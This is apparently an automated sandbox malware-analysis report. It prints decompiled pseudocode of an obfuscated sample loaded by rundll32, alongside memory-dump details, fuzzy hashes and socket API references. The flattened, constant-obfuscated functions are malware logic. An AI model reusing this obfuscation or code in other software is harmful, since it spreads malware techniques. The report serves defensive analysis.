                                                                                                                                    				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                                    				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                                    				_v1628 = 0x50edf9;
                                                                                                                                    				_v1628 = _v1628 * 0x73;
                                                                                                                                    				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                                    				_v1772 = 0x77fe3c;
                                                                                                                                    				_v1772 = _v1772 + 0x89a9;
                                                                                                                                    				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                                    				_v1772 = _v1772 + 0xffffc435;
                                                                                                                                    				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                                    				_v1780 = 0x481950;
                                                                                                                                    				_v1780 = _v1780 >> 0xb;
                                                                                                                                    				_v1780 = _v1780 | 0x104efd63;
                                                                                                                                    				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                                    				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                                    				_v1636 = 0x899427;
                                                                                                                                    				_v1636 = _v1636 << 0x10;
                                                                                                                                    				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                                    				_v1812 = 0xafb495;
                                                                                                                                    				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                                    				_v1812 = _v1812 + 0xffffb280;
                                                                                                                                    				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                                    				_v1732 = 0xe6dab0;
                                                                                                                                    				_v1732 = _v1732 + 0x38b;
                                                                                                                                    				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                                    				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                                    				_v1660 = 0xa1ff8d;
                                                                                                                                    				_v1660 = _v1660 / _t619;
                                                                                                                                    				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                                    				_v1820 = 0xd15a88;
                                                                                                                                    				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                                    				_v1820 = _v1820 >> 0x10;
                                                                                                                                    				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                                    				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                                    				_t675 = _v1600;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					while(1) {
                                                                                                                                    						L2:
                                                                                                                                    						_t620 = 0x424d9d2;
                                                                                                                                    						do {
                                                                                                                                    							L3:
                                                                                                                                    							while(_t677 != 0x19ebf08) {
                                                                                                                                    								if(_t677 == _t620) {
                                                                                                                                    									_push(_v1600);
                                                                                                                                    									_push(_v1808);
                                                                                                                                    									_t585 = E002DD389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                                    									_t682 =  &(_t682[7]);
                                                                                                                                    									__eflags = _t585;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										E002D1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                                    										E002D1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                                    										_t682 =  &(_t682[6]);
                                                                                                                                    									}
                                                                                                                                    									L14:
                                                                                                                                    									_t677 = 0x19ebf08;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										L2:
                                                                                                                                    										_t620 = 0x424d9d2;
                                                                                                                                    										goto L3;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								if(_t677 == 0x5bc69f5) {
                                                                                                                                    									_t592 = E002DD2CE(_t620);
                                                                                                                                    									__eflags = _t592 - E002C3DE2(_t620);
                                                                                                                                    									_t583 = 0x7574965;
                                                                                                                                    									_t677 = 0x8166b1d;
                                                                                                                                    									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    								if(_t677 == 0x8166b1d) {
                                                                                                                                    									__eflags = _t675 - _t583;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										_t677 = 0xd369ee2;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    									_push(_t620);
                                                                                                                                    									_push(_t620);
                                                                                                                                    									_t606 = E002DBB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                                    									_t682 =  &(_t682[6]);
                                                                                                                                    									__eflags = _t606;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										L12:
                                                                                                                                    										return _t606;
                                                                                                                                    									}
                                                                                                                                    									_t677 = 0xd369ee2;
                                                                                                                                    									goto L1;
                                                                                                                                    								}
                                                                                                                                    								if(_t677 == 0xb42e112) {
                                                                                                                                    									_t677 = 0x5bc69f5;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								if(_t677 == 0xd369ee2) {
                                                                                                                                    									E002DDA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                                    									 *((short*)(E002CB6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                                    									E002C8969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                                    									_push(_v1632);
                                                                                                                                    									_push(_v1744);
                                                                                                                                    									E002C47CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E002DDCF7(_v1680, 0x2c1328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                                    									E002CA8B0(_v1704, _t598, _v1800);
                                                                                                                                    									_t603 = E002CEA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                                    									_t682 =  &(_t682[0x17]);
                                                                                                                                    									__eflags = _t603;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										_t583 = 0x7574965;
                                                                                                                                    										__eflags = _t675 - 0x7574965;
                                                                                                                                    										_t620 = 0x424d9d2;
                                                                                                                                    										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    									goto L14;
                                                                                                                                    								}
                                                                                                                                    								_t696 = _t677 - 0xe2e667c;
                                                                                                                                    								if(_t677 != 0xe2e667c) {
                                                                                                                                    									goto L25;
                                                                                                                                    								}
                                                                                                                                    								_push(_v1804);
                                                                                                                                    								_push( &_v1564);
                                                                                                                                    								_push(_t620);
                                                                                                                                    								_push(0);
                                                                                                                                    								_push( &_v1596);
                                                                                                                                    								_push(_v1652);
                                                                                                                                    								_push(0);
                                                                                                                                    								_t606 = E002CAB87(_v1796, _v1724, _t696);
                                                                                                                                    								if(_t606 == 0) {
                                                                                                                                    									goto L12;
                                                                                                                                    								}
                                                                                                                                    								E002D1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                                    								return E002D1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                                    							}
                                                                                                                                    							E002D1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                                    							_t682 =  &(_t682[3]);
                                                                                                                                    							_t677 = 0xe6feec1;
                                                                                                                                    							_t583 = 0x7574965;
                                                                                                                                    							_t620 = 0x424d9d2;
                                                                                                                                    							L25:
                                                                                                                                    							__eflags = _t677 - 0xe6feec1;
                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                    						return _t583;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x002d7602
                                                                                                                                    0x002d760a
                                                                                                                                    0x002d7612
                                                                                                                                    0x002d761a
                                                                                                                                    0x002d7622
                                                                                                                                    0x002d762a
                                                                                                                                    0x002d762f
                                                                                                                                    0x002d7637
                                                                                                                                    0x002d763f
                                                                                                                                    0x002d7647
                                                                                                                                    0x002d7652
                                                                                                                                    0x002d765a
                                                                                                                                    0x002d7665
                                                                                                                                    0x002d766d
                                                                                                                                    0x002d7675
                                                                                                                                    0x002d767d
                                                                                                                                    0x002d7685
                                                                                                                                    0x002d7690
                                                                                                                                    0x002d769b
                                                                                                                                    0x002d76a6
                                                                                                                                    0x002d76b1
                                                                                                                                    0x002d76c5
                                                                                                                                    0x002d76cc
                                                                                                                                    0x002d76d7
                                                                                                                                    0x002d76df
                                                                                                                                    0x002d76e7
                                                                                                                                    0x002d76ec
                                                                                                                                    0x002d76f4
                                                                                                                                    0x002d76fc
                                                                                                                                    0x002d7703
                                                                                                                                    0x002d7703
                                                                                                                                    0x002d7708
                                                                                                                                    0x002d7708
                                                                                                                                    0x002d7708
                                                                                                                                    0x002d770d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d770d
                                                                                                                                    0x002d7717
                                                                                                                                    0x002d799c
                                                                                                                                    0x002d79aa
                                                                                                                                    0x002d79ca
                                                                                                                                    0x002d79cf
                                                                                                                                    0x002d79d2
                                                                                                                                    0x002d79d4
                                                                                                                                    0x002d79fa
                                                                                                                                    0x002d7a1f
                                                                                                                                    0x002d7a24
                                                                                                                                    0x002d7a24
                                                                                                                                    0x002d78e9
                                                                                                                                    0x002d78e9
                                                                                                                                    0x002d7703
                                                                                                                                    0x002d7703
                                                                                                                                    0x002d7708
                                                                                                                                    0x002d7708
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7708
                                                                                                                                    0x002d7703
                                                                                                                                    0x002d7723
                                                                                                                                    0x002d7977
                                                                                                                                    0x002d7983
                                                                                                                                    0x002d798a
                                                                                                                                    0x002d798f
                                                                                                                                    0x002d7994
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7994
                                                                                                                                    0x002d772f
                                                                                                                                    0x002d7913
                                                                                                                                    0x002d7915
                                                                                                                                    0x002d7957
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7957
                                                                                                                                    0x002d7917
                                                                                                                                    0x002d7918
                                                                                                                                    0x002d793d
                                                                                                                                    0x002d7942
                                                                                                                                    0x002d7945
                                                                                                                                    0x002d7947
                                                                                                                                    0x002d77e4
                                                                                                                                    0x002d77e4
                                                                                                                                    0x002d77e4
                                                                                                                                    0x002d794d
                                                                                                                                    0x00000000
                                                                                                                                    0x002d794d
                                                                                                                                    0x002d773b
                                                                                                                                    0x002d7909
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7909
                                                                                                                                    0x002d7747
                                                                                                                                    0x002d7804
                                                                                                                                    0x002d783e
                                                                                                                                    0x002d7848
                                                                                                                                    0x002d784d
                                                                                                                                    0x002d7859
                                                                                                                                    0x002d78a6
                                                                                                                                    0x002d78b8
                                                                                                                                    0x002d78dd
                                                                                                                                    0x002d78e2
                                                                                                                                    0x002d78e5
                                                                                                                                    0x002d78e7
                                                                                                                                    0x002d78f0
                                                                                                                                    0x002d78fa
                                                                                                                                    0x002d78fc
                                                                                                                                    0x002d7901
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7901
                                                                                                                                    0x00000000
                                                                                                                                    0x002d78e7
                                                                                                                                    0x002d774d
                                                                                                                                    0x002d7753
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d7759
                                                                                                                                    0x002d7764
                                                                                                                                    0x002d7765
                                                                                                                                    0x002d7766
                                                                                                                                    0x002d776f
                                                                                                                                    0x002d7770
                                                                                                                                    0x002d7782
                                                                                                                                    0x002d7784
                                                                                                                                    0x002d778e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d77ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002d77d7
                                                                                                                                    0x002d7a49
                                                                                                                                    0x002d7a4e
                                                                                                                                    0x002d7a51
                                                                                                                                    0x002d7a56
                                                                                                                                    0x002d7a5b
                                                                                                                                    0x002d7a60
                                                                                                                                    0x002d7a60
                                                                                                                                    0x002d7a60
                                                                                                                                    0x00000000
                                                                                                                                    0x002d770d
                                                                                                                                    0x002d7708

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                    • API String ID: 0-2206596976
                                                                                                                                    • Opcode ID: 4dfecedf9548c4a9fc94f372f178d8e57ef79a5d187916105c57515989ce7b2f
                                                                                                                                    • Instruction ID: 521389647840324b02933c4777ed4b8a6aae6ce28b1b5d793385f186276b5f62
                                                                                                                                    • Opcode Fuzzy Hash: 4dfecedf9548c4a9fc94f372f178d8e57ef79a5d187916105c57515989ce7b2f
                                                                                                                                    • Instruction Fuzzy Hash: 3552FE715083819BD378CF21C54AB9FBBE1BBC4308F108A1EE5DA96260E7B18959DF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 10012C6C
                                                                                                                                    • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                    • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                    • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                      • Part of subcall function 1001DD46: GetDlgItem.USER32(?,67083A02), ref: 1001DD53
                                                                                                                                      • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                    • String ID: Connected$Disconnected$Wait...
                                                                                                                                    • API String ID: 2263617321-2304371739
                                                                                                                                    • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                    • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                    • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                    • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C2251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				char _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				void* _t323;
                                                                                                                                    				signed int _t369;
                                                                                                                                    				signed int _t371;
                                                                                                                                    				signed int _t372;
                                                                                                                                    				signed int _t373;
                                                                                                                                    				signed int _t374;
                                                                                                                                    				signed int _t375;
                                                                                                                                    				signed int _t376;
                                                                                                                                    				signed int _t377;
                                                                                                                                    				signed int _t378;
                                                                                                                                    				signed int _t379;
                                                                                                                                    				void* _t382;
                                                                                                                                    				signed int* _t424;
                                                                                                                                    				void* _t427;
                                                                                                                                    				void* _t428;
                                                                                                                                    				void* _t431;
                                                                                                                                    
                                                                                                                                    				_t425 = _a4;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t424 = __edx;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t323);
                                                                                                                                    				_v104 = 0xfd7ba2;
                                                                                                                                    				_t428 = _t427 + 0x14;
                                                                                                                                    				_v104 = _v104 << 2;
                                                                                                                                    				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                                    				_t382 = 0x3e8dc94;
                                                                                                                                    				_v112 = 0x53a35e;
                                                                                                                                    				_t371 = 0x1c;
                                                                                                                                    				_v112 = _v112 / _t371;
                                                                                                                                    				_v112 = _v112 << 0xb;
                                                                                                                                    				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                                    				_v100 = 0x45b9a1;
                                                                                                                                    				_v100 = _v100 + 0xffff7cfc;
                                                                                                                                    				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                                    				_v92 = 0xd93693;
                                                                                                                                    				_v92 = _v92 + 0xb87a;
                                                                                                                                    				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                                    				_v160 = 0x746cf1;
                                                                                                                                    				_v160 = _v160 ^ 0x2b133776;
                                                                                                                                    				_v160 = _v160 + 0xffff944c;
                                                                                                                                    				_v160 = _v160 / _t371;
                                                                                                                                    				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                                    				_v144 = 0x9ec305;
                                                                                                                                    				_v144 = _v144 + 0xffffd43e;
                                                                                                                                    				_v144 = _v144 << 3;
                                                                                                                                    				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                                    				_v148 = 0x64c482;
                                                                                                                                    				_v148 = _v148 + 0x3823;
                                                                                                                                    				_t372 = 0x6f;
                                                                                                                                    				_v148 = _v148 / _t372;
                                                                                                                                    				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                                    				_v68 = 0x131d36;
                                                                                                                                    				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                                    				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                                    				_v124 = 0xcf68d3;
                                                                                                                                    				_v124 = _v124 + 0x418a;
                                                                                                                                    				_v124 = _v124 + 0xdb2c;
                                                                                                                                    				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                                    				_v140 = 0x60ea9a;
                                                                                                                                    				_v140 = _v140 >> 0xa;
                                                                                                                                    				_v140 = _v140 >> 4;
                                                                                                                                    				_v140 = _v140 ^ 0x0002f747;
                                                                                                                                    				_v116 = 0xa906b8;
                                                                                                                                    				_t373 = 0x61;
                                                                                                                                    				_v116 = _v116 * 0x66;
                                                                                                                                    				_v116 = _v116 / _t373;
                                                                                                                                    				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                                    				_v152 = 0x1b4b23;
                                                                                                                                    				_v152 = _v152 + 0x6529;
                                                                                                                                    				_v152 = _v152 << 7;
                                                                                                                                    				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                                    				_v56 = 0xb64e13;
                                                                                                                                    				_t374 = 0x36;
                                                                                                                                    				_v56 = _v56 / _t374;
                                                                                                                                    				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                                    				_v180 = 0xa61587;
                                                                                                                                    				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                                    				_t375 = 0x7a;
                                                                                                                                    				_v180 = _v180 * 0x16;
                                                                                                                                    				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                                    				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                                    				_v120 = 0x473252;
                                                                                                                                    				_v120 = _v120 + 0xffff4692;
                                                                                                                                    				_v120 = _v120 / _t375;
                                                                                                                                    				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                                    				_v60 = 0x2fd158;
                                                                                                                                    				_v60 = _v60 + 0x5b64;
                                                                                                                                    				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                                    				_v84 = 0xc57bbf;
                                                                                                                                    				_v84 = _v84 ^ 0x7beef004;
                                                                                                                                    				_v84 = _v84 ^ 0x7b204221;
                                                                                                                                    				_v52 = 0xc39e48;
                                                                                                                                    				_t376 = 0x4d;
                                                                                                                                    				_v52 = _v52 / _t376;
                                                                                                                                    				_v52 = _v52 ^ 0x0006d078;
                                                                                                                                    				_v108 = 0x102acf;
                                                                                                                                    				_v108 = _v108 >> 0xa;
                                                                                                                                    				_v108 = _v108 ^ 0x000242b6;
                                                                                                                                    				_v80 = 0xaaee53;
                                                                                                                                    				_t377 = 0x79;
                                                                                                                                    				_v80 = _v80 * 0x74;
                                                                                                                                    				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                                    				_v88 = 0x1ad2b9;
                                                                                                                                    				_v88 = _v88 | 0x310da8db;
                                                                                                                                    				_v88 = _v88 ^ 0x311cb062;
                                                                                                                                    				_v136 = 0x81cc6c;
                                                                                                                                    				_v136 = _v136 >> 0xc;
                                                                                                                                    				_v136 = _v136 << 0xd;
                                                                                                                                    				_v136 = _v136 ^ 0x0107e876;
                                                                                                                                    				_v96 = 0x2bc0c4;
                                                                                                                                    				_v96 = _v96 * 0x4c;
                                                                                                                                    				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                                    				_v176 = 0x403c4e;
                                                                                                                                    				_t174 =  &_v176; // 0x403c4e
                                                                                                                                    				_v176 =  *_t174 / _t377;
                                                                                                                                    				_t180 =  &_v176; // 0x403c4e
                                                                                                                                    				_v176 =  *_t180 * 0x5e;
                                                                                                                                    				_v176 = _v176 << 5;
                                                                                                                                    				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                                    				_v44 = 0x1618ce;
                                                                                                                                    				_v44 = _v44 + 0xffff8813;
                                                                                                                                    				_v44 = _v44 ^ 0x00124c47;
                                                                                                                                    				_v76 = 0x551030;
                                                                                                                                    				_v76 = _v76 + 0x65ef;
                                                                                                                                    				_v76 = _v76 ^ 0x005f521e;
                                                                                                                                    				_v132 = 0xb7ed4f;
                                                                                                                                    				_v132 = _v132 << 0xb;
                                                                                                                                    				_v132 = _v132 >> 0xa;
                                                                                                                                    				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                                    				_v64 = 0xfb13c3;
                                                                                                                                    				_v64 = _v64 * 0x16;
                                                                                                                                    				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                                    				_v168 = 0x8e8363;
                                                                                                                                    				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                                    				_v168 = _v168 >> 8;
                                                                                                                                    				_v168 = _v168 >> 4;
                                                                                                                                    				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                                    				_v72 = 0x8b4c84;
                                                                                                                                    				_t378 = 0x68;
                                                                                                                                    				_v72 = _v72 / _t378;
                                                                                                                                    				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                                    				_v128 = 0x282e65;
                                                                                                                                    				_v128 = _v128 >> 3;
                                                                                                                                    				_v128 = _v128 << 9;
                                                                                                                                    				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                                    				_v156 = 0xadd370;
                                                                                                                                    				_t379 = 0x3e;
                                                                                                                                    				_v156 = _v156 / _t379;
                                                                                                                                    				_v156 = _v156 << 0xf;
                                                                                                                                    				_v156 = _v156 + 0xffff35e7;
                                                                                                                                    				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                                    				_v164 = 0xb0b7ce;
                                                                                                                                    				_v164 = _v164 + 0xffffdc7a;
                                                                                                                                    				_v164 = _v164 * 0x61;
                                                                                                                                    				_v164 = _v164 + 0xffff24b0;
                                                                                                                                    				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                                    				_v172 = 0xee7b33;
                                                                                                                                    				_v172 = _v172 | 0x904c1683;
                                                                                                                                    				_v172 = _v172 * 0x2c;
                                                                                                                                    				_v172 = _v172 >> 4;
                                                                                                                                    				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                                    				_v48 = 0xdaf5e6;
                                                                                                                                    				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                                    				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                                    				goto L1;
                                                                                                                                    				do {
                                                                                                                                    					while(1) {
                                                                                                                                    						L1:
                                                                                                                                    						_t431 = _t382 - 0x9c1484f;
                                                                                                                                    						if(_t431 > 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						if(_t431 == 0) {
                                                                                                                                    							E002C3DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                                    							_t428 = _t428 + 0xc;
                                                                                                                                    							_t382 = 0x9229f3e;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t382 == 0x3e8dc94) {
                                                                                                                                    								_t382 = 0xb0d10f2;
                                                                                                                                    								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                                    								_t424[1] = _v104;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t382 == 0x73dcb22) {
                                                                                                                                    									E002D0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                                    									_t428 = _t428 + 0x10;
                                                                                                                                    									_t382 = 0xca0d778;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t382 == 0x8cfc35c) {
                                                                                                                                    										E002D0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                                    										_t428 = _t428 + 0x10;
                                                                                                                                    										_t382 = 0xfa9ed0f;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t382 == 0x9229f3e) {
                                                                                                                                    											E002E0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                                    											_t428 = _t428 + 0x10;
                                                                                                                                    											_t382 = 0xa7e786e;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t382 != 0x95701e8) {
                                                                                                                                    												goto L24;
                                                                                                                                    											} else {
                                                                                                                                    												_push(_t382);
                                                                                                                                    												_push(_t382);
                                                                                                                                    												_t369 = E002C7FF2(_t424[1]);
                                                                                                                                    												 *_t424 = _t369;
                                                                                                                                    												if(_t369 != 0) {
                                                                                                                                    													_t382 = 0x9c1484f;
                                                                                                                                    													continue;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L27:
                                                                                                                                    						__eflags =  *_t424;
                                                                                                                                    						_t322 =  *_t424 != 0;
                                                                                                                                    						__eflags = _t322;
                                                                                                                                    						return 0 | _t322;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t382 - 0xa7e786e;
                                                                                                                                    					if(_t382 == 0xa7e786e) {
                                                                                                                                    						E002D0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                                    						_t428 = _t428 + 0x10;
                                                                                                                                    						_t382 = 0x8cfc35c;
                                                                                                                                    						goto L24;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags = _t382 - 0xa84b454;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002E0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t382 - 0xb0d10f2;
                                                                                                                                    							if(_t382 == 0xb0d10f2) {
                                                                                                                                    								_t424[1] = E002DC631(_t425);
                                                                                                                                    								_t382 = 0x95701e8;
                                                                                                                                    								goto L1;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t382 - 0xca0d778;
                                                                                                                                    								if(_t382 == 0xca0d778) {
                                                                                                                                    									E002D0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                                    									_t428 = _t428 + 0x10;
                                                                                                                                    									_t382 = 0xa84b454;
                                                                                                                                    									goto L1;
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                                    									if(_t382 != 0xfa9ed0f) {
                                                                                                                                    										goto L24;
                                                                                                                                    									} else {
